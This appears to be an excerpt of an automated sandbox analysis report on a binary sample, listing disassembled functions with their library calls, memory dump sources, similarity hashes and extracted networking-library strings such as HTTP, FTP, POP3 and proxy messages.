    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F287
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: %s%s%s
    • API String ID: 88142382-3094730333
    • Opcode ID: 6d676301559948fb8f16a80ec8862ed87bb6d26afcc1c3f71aac5f2729284e17
    • Instruction ID: e5102b173e1cec407aab3a027667fd74c35725ff9287236838d611372a2d7d65
    • Opcode Fuzzy Hash: 6d676301559948fb8f16a80ec8862ed87bb6d26afcc1c3f71aac5f2729284e17
    • Instruction Fuzzy Hash: D2615CB5D00208EFCB04DF98D894BEEBBB6BF44305F108169E915AB341D375AA85CF91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069CD48
      • Part of subcall function 00683780: @_RTC_CheckStackVars@8.LIBCMT ref: 00683995
    • _strrchr.LIBCMT ref: 0069CBE8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strrchr
    • String ID: %s%s%s$(>p
    • API String ID: 2335863746-236696220
    • Opcode ID: fa42e95745714a37e411b71ab4942db6499f053ce7187d333edfe0402698d4ed
    • Instruction ID: 6b032e16747400a3d1f0ad3d8f3b8a3243df25de439f171d8f28888bae1cb861
    • Opcode Fuzzy Hash: fa42e95745714a37e411b71ab4942db6499f053ce7187d333edfe0402698d4ed
    • Instruction Fuzzy Hash: C0616DB0D00208EBDF14DF98D885BEEBBBABF48314F144169E5097B781D3749A85CB95
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00673B05
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Content-Length$Content-Length: %I64d$Failed sending PUT request
    • API String ID: 930174750-3178737968
    • Opcode ID: 241f744aa2f53d3186acf6fb21bf1f0389c148f293db149e7d25ba9aff12c5c4
    • Instruction ID: cdcff88950907f5e7804321b05c452f6ebcefa59275aa7e819b7bda418f4e3e8
    • Opcode Fuzzy Hash: 241f744aa2f53d3186acf6fb21bf1f0389c148f293db149e7d25ba9aff12c5c4
    • Instruction Fuzzy Hash: AA517C71E04318ABDB14DB94D882BEDB7B6AF44300F14C269E45DAB381E775AB81DF90
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00670DA2
    Strings
    • %s: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00670D59
    • Invalid TIMEVALUE, xrefs: 00670C57
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$Invalid TIMEVALUE
    • API String ID: 930174750-3467686708
    • Opcode ID: 5459174ff3861fbf02ceffff62dc81fa4836ad304fa88e558fda5ed9ad17fa5b
    • Instruction ID: dfce2d5a9b1f9003ca150c1b97c691752b2d23f959f8363a05e22e2ecc994f45
    • Opcode Fuzzy Hash: 5459174ff3861fbf02ceffff62dc81fa4836ad304fa88e558fda5ed9ad17fa5b
    • Instruction Fuzzy Hash: 46514EB5E00208EFDB54CF98D895BADB3B6AF48304F14C5A9E40DA7351D631AA85CFA1
    APIs
    • _strlen.LIBCMT ref: 0069448F
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: +$Got unexpected pop3-server response
    • API String ID: 3286693010-3277052657
    • Opcode ID: 41b0b3df2aa306eb2cf2a02baa4492f82ed86dced9df0264d7158f0c49d7fe00
    • Instruction ID: b01e0baf2263322cb7f65451de2ce4f05a96b5beea128fa4343487095a3dd51c
    • Opcode Fuzzy Hash: 41b0b3df2aa306eb2cf2a02baa4492f82ed86dced9df0264d7158f0c49d7fe00
    • Instruction Fuzzy Hash: 615149B1D00209DFCF04DFA8D891ABEBBB6FF48305F11815AD815AB341DB35AA42CB95
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: stale$true
    • API String ID: 1951014933-3006055996
    • Opcode ID: 3aacc9fa9958b87055353ad7d0683969e284c360a3b4267c1c677c2cd422fe8d
    • Instruction ID: f8d0889e4007006dff9d774ce6ede65530df1df7eddef5e99a6ba4ec91ea3e6b
    • Opcode Fuzzy Hash: 3aacc9fa9958b87055353ad7d0683969e284c360a3b4267c1c677c2cd422fe8d
    • Instruction Fuzzy Hash: 2B4170B5E041099BDB04EB54D891AFEB7F6EF4A305F248069E805AB341E634EE41CFB1
    APIs
    Strings
    • %zx%s, xrefs: 0066B7A2
    • Signaling end of chunked upload after trailers., xrefs: 0066B8A8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %zx%s$Signaling end of chunked upload after trailers.
    • API String ID: 1951014933-1891671182
    • Opcode ID: 991171257fb44eab909792341d5b9d5e420d51235898b1f037da4bcf11d69fc9
    • Instruction ID: a29b34cccd11906e355b5162bb4b5800505b7407abc7bf6a90ea933b41e114f2
    • Opcode Fuzzy Hash: 991171257fb44eab909792341d5b9d5e420d51235898b1f037da4bcf11d69fc9
    • Instruction Fuzzy Hash: 495179B0E00248EFCB04DF94D890BEEBBB6BF45304F1841ADE449AB792D7319981CB91
    APIs
    Strings
    • -----END PUBLIC KEY-----, xrefs: 00659019
    • -----BEGIN PUBLIC KEY-----, xrefs: 00658FC8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strstr
    • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
    • API String ID: 2882301372-1157147699
    • Opcode ID: 6d9103c06a61fbd53fc8e397a65b5ff8c11d26d0cfb37865e95c29712e765dc2
    • Instruction ID: d4e708a2f0b116e2e796e760f8dfc4822ff33182f3c6e6a698c0523cb64b7fad
    • Opcode Fuzzy Hash: 6d9103c06a61fbd53fc8e397a65b5ff8c11d26d0cfb37865e95c29712e765dc2
    • Instruction Fuzzy Hash: D75135B0D0021ADFCF14DFA8C885BEEBBB2AF05305F148559E819AB341D735AA54CBA5
    APIs
      • Part of subcall function 0066F270: _strlen.LIBCMT ref: 0066F28F
    • _strlen.LIBCMT ref: 0066F4B8
    • _strlen.LIBCMT ref: 0066F51B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066F5CF
    Strings
    • Hostname in DNS cache was stale, zapped, xrefs: 0066F58D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: Hostname in DNS cache was stale, zapped
    • API String ID: 3286693010-222773601
    • Opcode ID: ffa67b28c98e9e9d05874e0c129a5048d3fb7e9fe12fc3919c89b03d8883f013
    • Instruction ID: a276cb987e7b6febd9f99465e15b1dbc080e1a0c51629373fac346455a136f79
    • Opcode Fuzzy Hash: ffa67b28c98e9e9d05874e0c129a5048d3fb7e9fe12fc3919c89b03d8883f013
    • Instruction Fuzzy Hash: 1A4164F5E00209AFCB04DF94DC82BEEB3BABF48300F0485ADE51997341E671AA55CB94
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065DA76
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Uses proxy env variable %s == '%s'$_proxy$http_proxy
    • API String ID: 930174750-1393905770
    • Opcode ID: 6e71eebcf1a0dc30953dbcff08c2046b468530e97f6be3dc9db55244ea440de6
    • Instruction ID: 89f2b0778ad7c2cd74ca903c5b46929ad8fe317dfd8a7979fff9ce896962adc0
    • Opcode Fuzzy Hash: 6e71eebcf1a0dc30953dbcff08c2046b468530e97f6be3dc9db55244ea440de6
    • Instruction Fuzzy Hash: BF511AB5D002189FDB60DF64D886BEDB7B6AF45305F1080E9E94DA7342EA316B88CF51
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067CE91
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067CF6C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: .$0123456789
    • API String ID: 88142382-4187921772
    • Opcode ID: 92c7dbd7a72b36667158a099454c9e269cb0c995fec4443c4cfe645a3c67dbbb
    • Instruction ID: 2bf6e23855e7044ab66e93a85ff840710395d2a2a24006664fd326c53aa6e394
    • Opcode Fuzzy Hash: 92c7dbd7a72b36667158a099454c9e269cb0c995fec4443c4cfe645a3c67dbbb
    • Instruction Fuzzy Hash: 66414970D04209EFDB14CFA8C8547EEBBB3AF49314F24C06ED409A7381D2795A85DB62
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00687AAD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Q$]h$]h
    • API String ID: 930174750-913105577
    • Opcode ID: 719ebf3ed4873ec307278b743f72d347bd9a485ca200ce68bcac31b3099dc4e2
    • Instruction ID: c4ffea527ee8603177d28f8133493764419a411e8608d7428a729c127d0924d2
    • Opcode Fuzzy Hash: 719ebf3ed4873ec307278b743f72d347bd9a485ca200ce68bcac31b3099dc4e2
    • Instruction Fuzzy Hash: BA419BB4D04209EFCB44DF98C585BADBBB2FB48314F2482A9D409AB351D774DE81DB84
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: CWD %s$MKD %s$Server denied you to change to the given directory
    • API String ID: 930174750-1542016562
    • Opcode ID: 09c59a152abe8f31736fd99cdb5880fd9a69afea3ce8991a8fee4e76d2cd9c8d
    • Instruction ID: 24a8d9a345b9bb59f108adbe8fa76fa325e3b174f8e8f479df21c4591b030419
    • Opcode Fuzzy Hash: 09c59a152abe8f31736fd99cdb5880fd9a69afea3ce8991a8fee4e76d2cd9c8d
    • Instruction Fuzzy Hash: FA4161B8E00109DFDB04DF94D595AEEB3BAEF44304F218069E8059B752D739EE82DB90
    APIs
      • Part of subcall function 006E0066: GetOEMCP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E0091
    • _free.LIBCMT ref: 006E0335
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID: al%08X$%08X
    • API String ID: 269201875-2095630812
    • Opcode ID: ee8eb9b84b8860df6eb3dfc3a998766b12235b02eb214e1db5b524f087154d5a
    • Instruction ID: 8672b0656b4cb0c8f456217a959947d95abf4f961d745bd34c7d1075398d0efa
    • Opcode Fuzzy Hash: ee8eb9b84b8860df6eb3dfc3a998766b12235b02eb214e1db5b524f087154d5a
    • Instruction Fuzzy Hash: 1531B27180138AAFDB11DF59D884ADE77E6EF44310F10405AF9209B3A1EB769D91CF50
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067658F
      • Part of subcall function 00670630: _strlen.LIBCMT ref: 0067067A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: PROXY %s %s %s %li %li$TCP4$TCP6
    • API String ID: 1951014933-1242256665
    • Opcode ID: ecd36fbfc4c48942349307bbc8ba3645b72af0187a2205983a69887c449f1de1
    • Instruction ID: 4211f1b89fdcc82cfac33d780c6b698dde20f8664ce3fd127d7239911cc251db
    • Opcode Fuzzy Hash: ecd36fbfc4c48942349307bbc8ba3645b72af0187a2205983a69887c449f1de1
    • Instruction Fuzzy Hash: C9316075A00208EFEB54DF68DC41FE973BAAF49300F00C5A9F54D97255D670AA84CFA5
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E538
      • Part of subcall function 006621C0: _strlen.LIBCMT ref: 006621E6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: Accept-ranges: bytes$Couldn't use REST$RETR %s
    • API String ID: 1951014933-2207554236
    • Opcode ID: 865eb3ab4a1bd153c308a356dadbd77ae0d66dbd70abb61edb5a1c811ba96f22
    • Instruction ID: 6de26a795ed95f52c1ee21510ab29692b1803296b1ef91d733d6bd6fb4a9e2b3
    • Opcode Fuzzy Hash: 865eb3ab4a1bd153c308a356dadbd77ae0d66dbd70abb61edb5a1c811ba96f22
    • Instruction Fuzzy Hash: 6431A8B5E10208EFDF04DF98D841BEDBBBAEB44304F008469F9056B341D776AA85CB91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067E47B
      • Part of subcall function 0067E290: @_RTC_CheckStackVars@8.LIBCMT ref: 0067E340
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: +$p$p
    • API String ID: 930174750-4263630744
    • Opcode ID: aaae5fd3bb58cdf904cccc243fca0be626ee58d44ec6837ec0992cd081e2270a
    • Instruction ID: e6af99961d3dca9d27ff6159e0259a098d5a23ab0875fdf006823ef5b052b1a1
    • Opcode Fuzzy Hash: aaae5fd3bb58cdf904cccc243fca0be626ee58d44ec6837ec0992cd081e2270a
    • Instruction Fuzzy Hash: 5D3180759042489FCB14CF68D8407EDBBB2FB49314F10C1E9E81D9B346C636AA99CF40
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067137D
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 006713E5
    Strings
    • Malformatted trailing header ! Skipping trailer., xrefs: 006713C5
    • %s%s, xrefs: 006713A4
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8___from_strstr_to_strchr
    • String ID: %s%s$Malformatted trailing header ! Skipping trailer.
    • API String ID: 119698547-1371318721
    • Opcode ID: a743d2911a7a001c4a5b1aced9f01dce440a7f777b45b9ceff54caa3ef1fb91d
    • Instruction ID: faa035c584b6044188fb3930a263f3a2730c7565bee8fda694f4bdfe061a1b3e
    • Opcode Fuzzy Hash: a743d2911a7a001c4a5b1aced9f01dce440a7f777b45b9ceff54caa3ef1fb91d
    • Instruction Fuzzy Hash: 7D310AB0E0020CAFDB40DFA8C895BAEBBB6AF45315F14C5A9E4189B341D3B59A44CB91
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 006353ED
    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0063543C
      • Part of subcall function 006BDD10: _Yarn.LIBCPMT ref: 006BDD2F
      • Part of subcall function 006BDD10: _Yarn.LIBCPMT ref: 006BDD53
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063546E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
    • String ID: bad locale name
    • API String ID: 3628047217-1405518554
    • Opcode ID: 8aa41c4610fd161f6f8478dc9b98376596b43478bd24f0653b33be44a100e8fa
    • Instruction ID: cc1eee98139123440c860ed23896efdb2fc21f7bd6da36c23c6d2dc17001da3c
    • Opcode Fuzzy Hash: 8aa41c4610fd161f6f8478dc9b98376596b43478bd24f0653b33be44a100e8fa
    • Instruction Fuzzy Hash: A811B271904B849FD360DF69C801B9BBBF8EF18710F008A1EE499D7B81E775A508CB95
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: hhm
    • API String ID: 0-664977344
    • Opcode ID: bffee99ac77b83d9daa236bad6bcf9c5e99345cf74b5b89e3b3cbf6e0327e620
    • Instruction ID: 0048decb4e82ce399f0b40f3213ca6e5911eca35c3cc9629dc43296604908bbc
    • Opcode Fuzzy Hash: bffee99ac77b83d9daa236bad6bcf9c5e99345cf74b5b89e3b3cbf6e0327e620
